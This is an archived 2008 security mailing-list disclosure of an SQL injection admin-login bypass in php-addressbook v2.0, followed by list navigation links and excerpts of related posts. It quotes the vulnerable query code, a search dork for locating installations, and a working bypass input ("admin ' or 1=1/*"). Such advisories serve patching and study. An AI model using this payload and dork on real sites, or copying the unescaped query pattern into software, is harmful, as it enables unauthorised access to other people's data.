php-addressbook v2.0 SQL Injection Vulnerbility
- From: hadihadi_zedehal_2006@xxxxxxxxx
- Date: 26 Mar 2008 10:11:27 -0000
########################################################################
# #
# php-addressbook v2.0 SQL Injection Vulnerbility #
# [admin Authentication bypass] #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: © php-addressbook v2.0
-----------------------------------
vuln code in index.php:
line 26:$username = $_POST['username'];
ine 27:$password = $_POST['password'];
and line 28:
$sql = "SELECT * FROM $usertable WHERE username='$username' AND password=PASSWORD('$password')";
-----------------------
vuln:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
tnx: all hackerz
- Prev by Date: Re: hacking the mitsubishi GB-50A
- Next by Date: Re: Logaholic Web Analytics Software
- Previous by thread: Aztech ADSL2/2+ 4 Port remote root
- Next by thread: Re: Logaholic Web Analytics Software
- Index(es):
Relevant Pages
- CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities
... Virangar Security Team ... special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
... & my lovely friend arashfrom emperor team:) ... sql vuln code in login.php:
... (Bugtraq) - blur6ex-0.3.462 LOCAL FILE INCLUSION Vulnerbility
... Discoverd By:Virangar Security Team (hadihadi) ... special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
... & all virangar members & all iranian hackerz ... & my lovely friend arashfrom
emperor team:) ... (Bugtraq) - dbdisplay.pl(all versions) Remote execut Vulnerability
... Virangar Security Team ... & all virangar members & all iranian hackerz
... greetz:to my best friend in the world hadi_aryaie2004 ... (Bugtraq) - neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)
... Discoverd By: virangar security team ... special tnx to:MR.nosrati,MR.hesy,satan,Zahra
... & all virangar members & all iranian hackerz ... (Bugtraq) - boastMachine <=3.1 SQL Injection Vulnerbility
... Virangar Security Team ... Discoverd By:virangar security team ...
& all virangar members & all hackerz ... & my lovely friend arashfrom emperor team:)
... (Bugtraq)